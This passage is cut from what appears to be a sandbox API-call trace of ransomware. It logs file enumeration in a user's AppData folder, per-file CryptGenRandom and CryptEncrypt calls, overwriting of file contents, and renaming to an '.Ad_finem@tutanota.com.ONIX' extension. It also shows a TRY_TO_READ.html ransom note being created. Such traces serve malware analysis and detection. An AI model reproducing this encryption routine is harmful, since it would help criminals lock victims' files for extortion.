Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.085] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.086] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.087] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.088] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x87ee) returned 0xf70048 [0129.089] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x87ee) returned 0xf78840 [0129.089] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.089] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x87ee, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x87ee, lpOverlapped=0x0) returned 1 [0129.091] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x87ee, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.091] CloseHandle (hObject=0x524) returned 1 [0129.092] GetProcessHeap () returned 0x410000 [0129.092] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.092] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9jmp1rnyhwi6 hu.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9jmp1rnyhwi6 hu.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.095] GetProcessHeap () returned 0x410000 [0129.095] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.095] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7c105d0, ftCreationTime.dwHighDateTime=0x1d5e77c, ftLastAccessTime.dwLowDateTime=0x5d79af00, ftLastAccessTime.dwHighDateTime=0x1d5d9c8, ftLastWriteTime.dwLowDateTime=0x5d79af00, ftLastWriteTime.dwHighDateTime=0x1d5d9c8, nFileSizeHigh=0x0, nFileSizeLow=0x6d79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A1W7h70NdaO5u.avi", cAlternateFileName="A1W7H7~1.AVI")) returned 1 [0129.095] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\a1w7h70ndao5u.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.096] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.096] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x6d79, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.096] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.096] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.097] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.097] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.097] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.097] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.097] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi", dwFileAttributes=0x80) returned 1 [0129.097] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi") returned 64 [0129.097] GetProcessHeap () returned 0x410000 [0129.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x431d68 [0129.097] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi" [0129.097] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.097] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=28025) returned 1 [0129.097] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x6d79 [0129.097] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.097] GetProcessHeap () returned 0x410000 [0129.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.097] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.098] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.099] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.100] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6d79) returned 0x4e1b68 [0129.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6d79) returned 0xf70048 [0129.102] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.102] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x6d79, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x6d79, lpOverlapped=0x0) returned 1 [0129.104] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x6d79, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.104] CloseHandle (hObject=0x524) returned 1 [0129.105] GetProcessHeap () returned 0x410000 [0129.105] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.105] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\a1w7h70ndao5u.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A1W7h70NdaO5u.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\a1w7h70ndao5u.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.108] GetProcessHeap () returned 0x410000 [0129.108] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.108] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0129.108] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0129.111] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d576360, ftCreationTime.dwHighDateTime=0x1d5de42, ftLastAccessTime.dwLowDateTime=0x35da73c0, ftLastAccessTime.dwHighDateTime=0x1d5d8ca, ftLastWriteTime.dwLowDateTime=0x35da73c0, ftLastWriteTime.dwHighDateTime=0x1d5d8ca, nFileSizeHigh=0x0, nFileSizeLow=0xece9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cKNzI-KT.jpg", cAlternateFileName="")) returned 1 [0129.111] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cknzi-kt.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.111] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.112] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xece9, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.112] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.112] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.112] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.112] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.113] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.113] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.113] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg", dwFileAttributes=0x80) returned 1 [0129.113] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg") returned 59 [0129.113] GetProcessHeap () returned 0x410000 [0129.113] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0129.113] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg" [0129.113] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.113] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=60649) returned 1 [0129.113] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xece9 [0129.113] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.113] GetProcessHeap () returned 0x410000 [0129.113] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.113] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.114] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.116] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.117] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.118] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xece9) returned 0xf70048 [0129.118] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xece9) returned 0xf7ed40 [0129.118] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.118] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0xece9, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0xece9, lpOverlapped=0x0) returned 1 [0129.121] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xece9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.121] CloseHandle (hObject=0x524) returned 1 [0129.122] GetProcessHeap () returned 0x410000 [0129.122] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.122] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cknzi-kt.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cKNzI-KT.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cknzi-kt.jpg.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.136] GetProcessHeap () returned 0x410000 [0129.136] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.136] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2806a6b0, ftCreationTime.dwHighDateTime=0x1d5de42, ftLastAccessTime.dwLowDateTime=0x49a5ea90, ftLastAccessTime.dwHighDateTime=0x1d5e4ed, ftLastWriteTime.dwLowDateTime=0x49a5ea90, ftLastWriteTime.dwHighDateTime=0x1d5e4ed, nFileSizeHigh=0x0, nFileSizeLow=0x15a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d0FXPxlp.png", cAlternateFileName="")) returned 1 [0129.136] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\d0fxpxlp.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.136] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.137] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15a3, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.137] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.137] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.137] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.137] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.138] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.138] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.138] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png", dwFileAttributes=0x80) returned 1 [0129.138] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png") returned 59 [0129.138] GetProcessHeap () returned 0x410000 [0129.138] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0129.138] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png" [0129.138] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.138] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=5539) returned 1 [0129.138] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15a3 [0129.138] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.138] GetProcessHeap () returned 0x410000 [0129.138] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.138] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.139] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.140] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.141] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.142] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15a3) returned 0x4e1b68 [0129.142] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15a3) returned 0x4e3118 [0129.142] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.142] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x15a3, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x15a3, lpOverlapped=0x0) returned 1 [0129.142] SetFilePointer (in: hFile=0x524, lDistanceToMove=-5539, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.142] WriteFile (in: hFile=0x524, lpBuffer=0x4e3118*, nNumberOfBytesToWrite=0x15a3, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e3118*, lpNumberOfBytesWritten=0x367f44c*=0x15a3, lpOverlapped=0x0) returned 1 [0129.144] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15a3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.144] CloseHandle (hObject=0x524) returned 1 [0129.144] GetProcessHeap () returned 0x410000 [0129.144] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.144] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\d0fxpxlp.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d0FXPxlp.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\d0fxpxlp.png.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.146] GetProcessHeap () returned 0x410000 [0129.146] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.146] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc5829f0, ftCreationTime.dwHighDateTime=0x1d5e23b, ftLastAccessTime.dwLowDateTime=0xd036ffc0, ftLastAccessTime.dwHighDateTime=0x1d5d964, ftLastWriteTime.dwLowDateTime=0xd036ffc0, ftLastWriteTime.dwHighDateTime=0x1d5d964, nFileSizeHigh=0x0, nFileSizeLow=0x5e4b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dIJde7stMV h 8B9NLQ.bmp", cAlternateFileName="DIJDE7~1.BMP")) returned 1 [0129.146] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dIJde7stMV h 8B9NLQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dijde7stmv h 8b9nlq.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.146] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.147] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5e4b, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.147] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.147] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, 